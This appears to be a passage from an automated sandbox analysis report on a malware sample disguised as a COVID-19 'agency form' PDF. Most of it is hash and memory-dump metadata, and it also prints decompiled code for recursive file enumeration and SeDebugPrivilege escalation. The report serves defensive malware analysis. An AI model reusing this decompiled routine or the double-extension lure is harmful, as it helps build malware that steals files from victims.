                                          • Instruction ID: c90cd4062ace3f207668c0acd3ed83c52acd26d38fda18679f69336cc23e5b7a
                                          • Opcode Fuzzy Hash: 9c16f6b7828073209991392ad8c06f419d8a7c1ddcc4858d4996a9cc1b13c776
                                          • Instruction Fuzzy Hash: 6F41AFB1D043099FDB14CF9AC984ADEBBF5FF48314F24852AE819AB220D7749985CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8BDE0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8BE67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 66fb9aa2607124b68cb8cea12a2fece8fe21519589b9f15af7e3cbd353eb2f90
                                          • Instruction ID: 36ceae60dbf6958c0af6906a057c875e43766deb03fe5e8fa37505210646a26a
                                          • Opcode Fuzzy Hash: 66fb9aa2607124b68cb8cea12a2fece8fe21519589b9f15af7e3cbd353eb2f90
                                          • Instruction Fuzzy Hash: 9221C2B5900209DFDB10CFAAD984ADEBBF8EB48325F14845AE954A3310D778A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8BDDF, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8BE67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 7a936f97576ce72df958d9e65f75485d0c3ef87a19db0e4336a290439acf911f
                                          • Instruction ID: b05671dc662efa6b88bbc15e6592725fa302fe9c6f03dc340e1f1b9b606ddc20
                                          • Opcode Fuzzy Hash: 7a936f97576ce72df958d9e65f75485d0c3ef87a19db0e4336a290439acf911f
                                          • Instruction Fuzzy Hash: 8321E2B5900208DFDB10CFA9D984ADEBBF4EB48324F14841AE914A3310D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B88848, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B89789,00000800,00000000,00000000), ref: 00B8999A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 7f6b30a2c978fe01fa65ccd7818d44f02d6f3e1693ef59099730443c6ba73636
                                          • Instruction ID: 077c2e17eaea0881ad263af7fd50fdcdcb36d5ac8a35175cee232992fece8a03
                                          • Opcode Fuzzy Hash: 7f6b30a2c978fe01fa65ccd7818d44f02d6f3e1693ef59099730443c6ba73636
                                          • Instruction Fuzzy Hash: C11133B28042089FCB10CF9AC844BEEFBF4EB88324F14846ED815B7210C7B4A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B89929, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B89789,00000800,00000000,00000000), ref: 00B8999A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 7b2f07970c7c9fce38c8b8ab71c98794eba79c321540dc18feed2a78054ac0bb
                                          • Instruction ID: 13cf9a912f463808f89e18bad6aac49a6dc71c5f9461f5356f4c8484b101c8ce
                                          • Opcode Fuzzy Hash: 7b2f07970c7c9fce38c8b8ab71c98794eba79c321540dc18feed2a78054ac0bb
                                          • Instruction Fuzzy Hash: 5D2127B5C002498FCB10CFA9C844BEEFBF4EB88314F14846ED455A7210C774A945CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B896A8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8970E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 3d10bfcc0ab3863770f71a376e47cd6ae55532054dbf70b8e4a0fe0b58b259d5
                                          • Instruction ID: 000b75e0e3d9b27555c9ec599a6fbb9527913cfd28561bd65da95f301294b38e
                                          • Opcode Fuzzy Hash: 3d10bfcc0ab3863770f71a376e47cd6ae55532054dbf70b8e4a0fe0b58b259d5
                                          • Instruction Fuzzy Hash: 6211E3B5C006498FCB10DF9AC544BDEFBF4EB88324F14845AD819B7610D775A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8FF20, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B8FF7D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: 3f5d33293ce7af230083c30a977149f68480ac293046be9888576ed95d49e360
                                          • Instruction ID: 6f8ee0cecba13057f972b88b53c0ca5c93a5fdc6d9b914c80eabd79d2f2746b7
                                          • Opcode Fuzzy Hash: 3f5d33293ce7af230083c30a977149f68480ac293046be9888576ed95d49e360
                                          • Instruction Fuzzy Hash: D91100B58002098FDB20DF99D584BDEBBF8EB48324F20845AE918A3300C7B4A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8FF1A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B8FF7D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: 7ce5172976fb232d6ec4b33166f89b2deb6f8ea875fb5f667a80e304a7c72ffd
                                          • Instruction ID: bc3c6107b8f79c2bc460d8009afbc7e76c393144c99087b05e1062c6d09e94f3
                                          • Opcode Fuzzy Hash: 7ce5172976fb232d6ec4b33166f89b2deb6f8ea875fb5f667a80e304a7c72ffd
                                          • Instruction Fuzzy Hash: 691106B59002498FDB20CF99D585BDEBBF4EB48324F14855AD914A3740C774A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D3B4, Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a10740924a3a8d1e2037f35852f65dab5271319f1ec83b275b15ee321aecf833
                                          • Instruction ID: fd9496035d05806e100b42ed23421db13363898b5dc7523a96e5512316f69692
                                          • Opcode Fuzzy Hash: a10740924a3a8d1e2037f35852f65dab5271319f1ec83b275b15ee321aecf833
                                          • Instruction Fuzzy Hash: 8A213AB1505240DFDB04EF20D9C0F26BB69FB84324F24C5A9E8054B3D6C336E856CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D4A0, Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65ef6882d49c111a214e63a160d23d8b07db1b903f85e4a262820149b7c0fb29
                                          • Instruction ID: 982d4844119116b515dd312c30cb57d578fde9110346b9e81dc7ddb1f565cb1f
                                          • Opcode Fuzzy Hash: 65ef6882d49c111a214e63a160d23d8b07db1b903f85e4a262820149b7c0fb29
                                          • Instruction Fuzzy Hash: 442128B1504240DFDB05EF54D9C0B26BF69FB84328F24C569E9050B39AC33AE855CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099D01C, Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221484152.000000000099D000.00000040.00000001.sdmp, Offset: 0099D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09134e841087669897bb8660837f23113be4af1a34ac567ea37e5df795bf9770
                                          • Instruction ID: a37c6a9667e04ef8f1d4c4e1d86e49ab3bbd8df084c912dff01a3d3994f91ad3
                                          • Opcode Fuzzy Hash: 09134e841087669897bb8660837f23113be4af1a34ac567ea37e5df795bf9770
                                          • Instruction Fuzzy Hash: 3F21F271504240DFDF14CF28D9C4B26BBA9FB88314F24C9A9D80A4B346C73BD846CA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099D006, Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221484152.000000000099D000.00000040.00000001.sdmp, Offset: 0099D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62903fada175f9d429f174b5a8d244f378858e140915f58127a5ec87f28744ee
                                          • Instruction ID: 66fcc41d7138e9f81bf9ed4af57790399b7ed3a6c9a50e0f10b277a5459623ee
                                          • Opcode Fuzzy Hash: 62903fada175f9d429f174b5a8d244f378858e140915f58127a5ec87f28744ee
                                          • Instruction Fuzzy Hash: F8218E755093C08FCB12CF24D9D0B15BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D49B, Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction ID: 8fcbe2044c6f3c27c6b87f401c845ca88dde56cf004339e2c9438ee505fb4db4
                                          • Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction Fuzzy Hash: 1811B176405280CFCB12DF14D5C4B16BF71FB84324F28C6AAE8050B75AC336D85ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D3AF, Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction ID: 0cef39134415e8453d7671f863fc93c7de8e7174574c322627fc067ba3dfc59f
                                          • Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction Fuzzy Hash: D911D376405280DFCB11DF20D5C4B16BF71FB94324F28C6A9D8490B7A6C336E85ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D781, Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83220b07262f67f16525e5f09559fb806b674cbedb4e6945d1c3b86e9f6dfeb0
                                          • Instruction ID: 2b1495a979cc6a189d72a838d455249cbc1c46b285c00fcb5b4d28c29d66db03
                                          • Opcode Fuzzy Hash: 83220b07262f67f16525e5f09559fb806b674cbedb4e6945d1c3b86e9f6dfeb0
                                          • Instruction Fuzzy Hash: C301F7B10097409AE720AA25CE80BA6FB9CEF41734F288859ED045B386D778AC44C7B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0098D780, Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b1d773cd4792cf6ef8f88f4748f74a49877f08bc4342799085fb009711008e4
                                          • Instruction ID: e124416246832149fb99e83683a072ad5da4e83c12ac982631ccd2f65d352684
                                          • Opcode Fuzzy Hash: 9b1d773cd4792cf6ef8f88f4748f74a49877f08bc4342799085fb009711008e4
                                          • Instruction Fuzzy Hash: 92F062B14093849BE7208A16CD84BA2FB9CEB45734F18C45AED085B786D7789C44CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00B8E560, Relevance: .3, Instructions: 315COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93b112e09ede9c1c471d980d68a2f4b4f950824a0677a343ae47ea64e8751803
                                          • Instruction ID: e6eb73ae77183a6522cb9a8e6c450e93a36631a1941cbccd6d2ed46759266e0b
                                          • Opcode Fuzzy Hash: 93b112e09ede9c1c471d980d68a2f4b4f950824a0677a343ae47ea64e8751803
                                          • Instruction Fuzzy Hash: 571295F1411F4ACAE710CF65EDA81893BA1B785B2AB914308D3615BAF1D7BC114AEF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8BCB4, Relevance: .3, Instructions: 265COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f008d0ef213ed80b4bb66d169907a2621f34249eeb175259fb36f7626fc3aba7
                                          • Instruction ID: 46cd6e217c43e6d024fa195db872e44c8a25f7490a19a1c4582ae331dfec3461
                                          • Opcode Fuzzy Hash: f008d0ef213ed80b4bb66d169907a2621f34249eeb175259fb36f7626fc3aba7
                                          • Instruction Fuzzy Hash: F7A17E32E006198FCF05EFA5C8445DEB7F2FF85300B1585AAE905BB261EB35A905CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B8E558, Relevance: .2, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 792eb111a3d12ee84699f538bd7ff90d31794020b0cecac58b723554102e0e3b
                                          • Instruction ID: e23f02dd82ed6bfa0d8d0f293074c995a69d6bd71a6ad780c0e99bb5f4d7d38e
                                          • Opcode Fuzzy Hash: 792eb111a3d12ee84699f538bd7ff90d31794020b0cecac58b723554102e0e3b
                                          • Instruction Fuzzy Hash: E1C1FEB1811B4E8BD710DF65ECA81897B71BB85B2AF514308D3616BAF0D7BC105AEF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CF1808, Relevance: .1, Instructions: 145COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10da0fb9b2a09b012264f382cdbe601fe2a23e69acb144858e966d03398f8c8d
                                          • Instruction ID: 230bf14c9b03159504a3e3a45e70d5015dd41939ccbfde87d3064c7f9edd336a
                                          • Opcode Fuzzy Hash: 10da0fb9b2a09b012264f382cdbe601fe2a23e69acb144858e966d03398f8c8d
                                          • Instruction Fuzzy Hash: 31519170E092088FDB45EFB9E981A9E7BF3EB89304F14C429D1059B364DF346A069F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CF1807, Relevance: .1, Instructions: 145COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a873688945a31d30a7f3e96920ea88a3ff93fabbee94a8c368f2f27d0e7b30c0
                                          • Instruction ID: 0780920e737f464461e4418a518d1bfb1f25755f01827c50c63dd6b5e76df65c
                                          • Opcode Fuzzy Hash: a873688945a31d30a7f3e96920ea88a3ff93fabbee94a8c368f2f27d0e7b30c0
                                          • Instruction Fuzzy Hash: 28519170E092088FDB45EFB9E981A9E7BF3EB89304F14C429D1059B364DF346A069F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CF1A60, Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7d9f01c11b6eeeccb69965f90d1f2ab254e91146a62ad810a65acea448dfcee
                                          • Instruction ID: 239bb8304f075781b355c8fa97e187f56c4ac4c7f8f96da92daee3701a250222
                                          • Opcode Fuzzy Hash: c7d9f01c11b6eeeccb69965f90d1f2ab254e91146a62ad810a65acea448dfcee
                                          • Instruction Fuzzy Hash: D34135B1E056188BEB5CCF6B8C4068EFAF7BFC8200F18C5BA850D66254EB7409468F15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04CF1A5F, Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f330868b6ae61fe0e05e523b3b5dfa39776b93415815689238d44302e50f8bb
                                          • Instruction ID: 1af80d5030957dfbab30cacb692b3f26102c8832734498392312e8dc4017ef03
                                          • Opcode Fuzzy Hash: 0f330868b6ae61fe0e05e523b3b5dfa39776b93415815689238d44302e50f8bb
                                          • Instruction Fuzzy Hash: 4B4128B1E056188BE75CCF6B8D4068EFAF3BFC8200F18C5BA851C6A254DF7409468F15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704 Parent PID: 5708 RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCOMMON

                                          Executed Functions

                                          Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				WCHAR* _t32;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t32 = E00405B6F(0, L"%s\\%s", _a4); // executed
					_t98 = _t32;
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}





















                                          0x00403d82
                                          0x00403d88
                                          0x00403d8c
                                          0x00403d8d
                                          0x00403d90
                                          0x00403ea9
                                          0x00403ea9
                                          0x00403eb4
                                          0x00403eb9
                                          0x00403ebb
                                          0x00403ec0
                                          0x00403f95
                                          0x00403f95
                                          0x00000000
                                          0x00403f95
                                          0x00403ece
                                          0x00403edb
                                          0x00403edd
                                          0x00403ee2
                                          0x00403f8e
                                          0x00403f8f
                                          0x00000000
                                          0x00403f94
                                          0x00000000
                                          0x00403ee8
                                          0x00403ef8
                                          0x00403f0a
                                          0x00403f12
                                          0x00403f18
                                          0x00403f26
                                          0x00403f28
                                          0x00403f2d
                                          0x00000000
                                          0x00000000
                                          0x00403f33
                                          0x00403f76
                                          0x00403f7c
                                          0x00000000
                                          0x00403f83
                                          0x00403f36
                                          0x00403f3a
                                          0x00000000
                                          0x00403f40
                                          0x00403f0c
                                          0x00403f10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403f41
                                          0x00403f41
                                          0x00403f4b
                                          0x00403f58
                                          0x00403f5c
                                          0x00403f88
                                          0x00000000
                                          0x00403f8d
                                          0x00403f60
                                          0x00000000
                                          0x00403f60
                                          0x00403ef8
                                          0x00403ee8
                                          0x00403da3
                                          0x00403da9
                                          0x00403ea6
                                          0x00403ea8
                                          0x00000000
                                          0x00403ea8
                                          0x00403db7
                                          0x00403dc4
                                          0x00403dc6
                                          0x00403dcb
                                          0x00403e9d
                                          0x00403e9e
                                          0x00403ea4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403dd1
                                          0x00403dd1
                                          0x00403dd8
                                          0x00000000
                                          0x00000000
                                          0x00403de2
                                          0x00403e12
                                          0x00403e22
                                          0x00403e30
                                          0x00403e36
                                          0x00403e3f
                                          0x00403e44
                                          0x00403e47
                                          0x00403e4a
                                          0x00403e4c
                                          0x00000000
                                          0x00000000
                                          0x00403e63
                                          0x00403e65
                                          0x00403e6a
                                          0x00403e6f
                                          0x00403f64
                                          0x00403f6a
                                          0x00000000
                                          0x00403f71
                                          0x00000000
                                          0x00403e6f
                                          0x00403e26
                                          0x00403e27
                                          0x00403e2e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403e2e
                                          0x00403dea
                                          0x00403df9
                                          0x00000000
                                          0x00000000
                                          0x00403e01
                                          0x00403e10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403e75
                                          0x00403e7f
                                          0x00403e8c
                                          0x00403e8e
                                          0x00403e97
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID: %s\%s$%s\*$Program Files$Windows
                                          • API String ID: 1690352074-2009209621
                                          • Opcode ID: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                          • Opcode Fuzzy Hash: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                          0x00406512
                                          0x00406514
                                          0x00406522
                                          0x00406524
                                          0x00406530
                                          0x00406534
                                          0x0040653f
                                          0x0040654e
                                          0x00406552
                                          0x0040655a
                                          0x0040655f
                                          0x0040656d
                                          0x00406570
                                          0x00406573
                                          0x0040657a
                                          0x00406589
                                          0x0040658d
                                          0x00406590
                                          0x00406594
                                          0x00000000
                                          0x0040659a
                                          0x004065a1

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                          • String ID: SeDebugPrivilege
